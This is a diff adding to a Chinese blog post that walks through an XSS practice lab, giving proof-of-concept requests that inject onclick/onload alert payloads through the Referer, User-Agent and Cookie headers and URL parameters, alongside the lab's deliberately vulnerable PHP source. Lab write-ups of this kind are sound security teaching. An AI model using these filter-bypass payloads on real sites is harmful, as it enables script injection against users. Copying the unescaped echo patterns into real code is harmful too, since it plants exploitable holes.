--- a/_posts/2020-9-14-xss靶场.md
+++ b/_posts/2020-9-14-xss靶场.md
@@ -262,5 +262,176 @@ tags:
   ?>	
   ```
 
-  
+
+
+
+
+
+### level11
+
+- 方法：首先右键查看源代码，发现在`name=t_ref`的`input`框中的值为数据包`referer`的值，考虑使用burpsuit抓包，在数据包中构造poc；在抓取的数据包中添加一行`referer:" type="text" onclick="alert('1')">`；出现弹窗。
+
+- poc:
+
+  ```
+  GET /xss/level11.php?keyword=good%20job! HTTP/1.1
+  Host: 192.168.0.200
+  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
+  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+  Accept-Encoding: gzip, deflate
+  referer:" type="text" onclick="alert('1')" >
+  Connection: close
+  Upgrade-Insecure-Requests: 1
+  ```
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  $str00 = $_GET["t_sort"];
+  $str11=$_SERVER['HTTP_REFERER'];
+  $str22=str_replace(">","",$str11);
+  $str33=str_replace("<","",$str22);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form id=search>
+  <input name="t_link"  value="'.'" type="hidden">
+  <input name="t_history"  value="'.'" type="hidden">
+  <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
+  <input name="t_ref"  value="'.$str33.'" type="hidden">
+  </form>
+  </center>';
+  ?>
+  ```
+
+
+
+
+### level12
+
+- 方法：首先右键查看源代码，发现在`name=t_ua`的`input`框中的值为数据包中`User-Agent`的值，考虑使用burpsuit抓包，在数据包中构造poc；在抓取的数据包中修改一行`User-Agent: " type="text" onclick="alert('1')" >`；出现弹窗。
+
+- poc:
+
+  ```
+  GET /xss/level12.php?keyword=good%20job! HTTP/1.1
+  Host: 192.168.0.200
+  User-Agent: " type="text" onclick="alert('1')" >
+  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+  Accept-Encoding: gzip, deflate
+  Referer: http://192.168.0.200/xss/level11.php?keyword=good%20job!
+  Connection: close
+  Upgrade-Insecure-Requests: 1
+  Cache-Control: max-age=0
+  ```
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  $str00 = $_GET["t_sort"];
+  $str11=$_SERVER['HTTP_USER_AGENT'];
+  $str22=str_replace(">","",$str11);
+  $str33=str_replace("<","",$str22);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form id=search>
+  <input name="t_link"  value="'.'" type="hidden">
+  <input name="t_history"  value="'.'" type="hidden">
+  <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
+  <input name="t_ua"  value="'.$str33.'" type="hidden">
+  </form>
+  </center>';
+  ?>
+  ```
+
+
+
+
+
+### level13
+
+- 方法：首先右键查看源代码，发现有四个隐藏框，构造url`http://192.168.0.200/xss/level13.php?keyword=good%20job!&t_link=1&t_history=1&t_sort=1&t_cook=1`，发现其中有一个隐藏框用户可控，再次输入`http://192.168.0.200/xss/level13.php?keyword=good%20job!&t_sort=1%26%23%E2%80%9C`，发现主要的字符都被过滤了，考虑其他地方构造；再次查看源代码，发现又一个隐藏框中出现了不同的数据，经过观察发现里面的值是用户的cookie，所以抓取数据包，把cookie修改为`Cookie: user=" type="text" onclick="alert('1')" >`；出现弹窗。
+
+- poc:
+
+  ```
+  GET /xss/level13.php?keyword=good%20job!&t_sort=1%26%23%E2%80%9C HTTP/1.1
+  Host: 192.168.0.200
+  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
+  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+  Accept-Encoding: gzip, deflate
+  Connection: close
+  Cookie: user=" type="text" onclick="alert('1')" >
+  Upgrade-Insecure-Requests: 1
+  Cache-Control: max-age=0
+  ```
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  setcookie("user", "call me maybe?", time()+3600);
+  ini_set("display_errors", 0);
+  $str = $_GET["keyword"];
+  $str00 = $_GET["t_sort"];
+  $str11=$_COOKIE["user"];
+  $str22=str_replace(">","",$str11);
+  $str33=str_replace("<","",$str22);
+  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
+  <form id=search>
+  <input name="t_link"  value="'.'" type="hidden">
+  <input name="t_history"  value="'.'" type="hidden">
+  <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
+  <input name="t_cook"  value="'.$str33.'" type="hidden">
+  </form>
+  </center>';
+  ?>
+  ```
+
+
+
+### level16
+
+- 方法：首先输入`1%22%3c%251%263%23%3e4`，右键查看源代码观察发现特殊字符都没有过滤；考虑构造`1%3cbody%2fonload%3dalert(%271%27)%3e` ,发现`/`被转为为空格的实体化了，考虑使用`%0a`代替空格；出现弹窗。
+
+- poc:`http://192.168.0.200/xss/level16.php?keyword=1%3cbody%0aonload%3dalert(%271%27)%3e`
+
+- 核心源代码：
+
+  ```php
+  <?php 
+  ini_set("display_errors", 0);
+  $str = strtolower($_GET["keyword"]);
+  $str2=str_replace("script","&nbsp;",$str);
+  $str3=str_replace(" ","&nbsp;",$str2);
+  $str4=str_replace("/","&nbsp;",$str3);
+  $str5=str_replace("	","&nbsp;",$str4);
+  echo "<center>".$str5."</center>";
+  ?>
+  ```
+
+
+
+
+
+### level17\18(同样的道理)
+
+- 方法：首先输入`arg01=1%22%3c%251%263%23%3e4&arg02=1%22%3c%251%263%23%3e4`，右键查看源代码观察发现特殊字符基本都被过滤了；考虑构造不需要特殊字符的poc ,利用url自带的`=`，可以考虑使用点击事件`onclick`，最后输入`arg01=1%20 onclick&arg02=alert(1)`；出现弹窗。
+
+- poc:`http://192.168.0.200/xss/level17.php?arg01=1%20%20onclick&arg02=alert(1)`
+
+- 核心源代码：
+
+  ```php
+  <?php
+  ini_set("display_errors", 0);
+  echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
+  ?>
+  ```
 
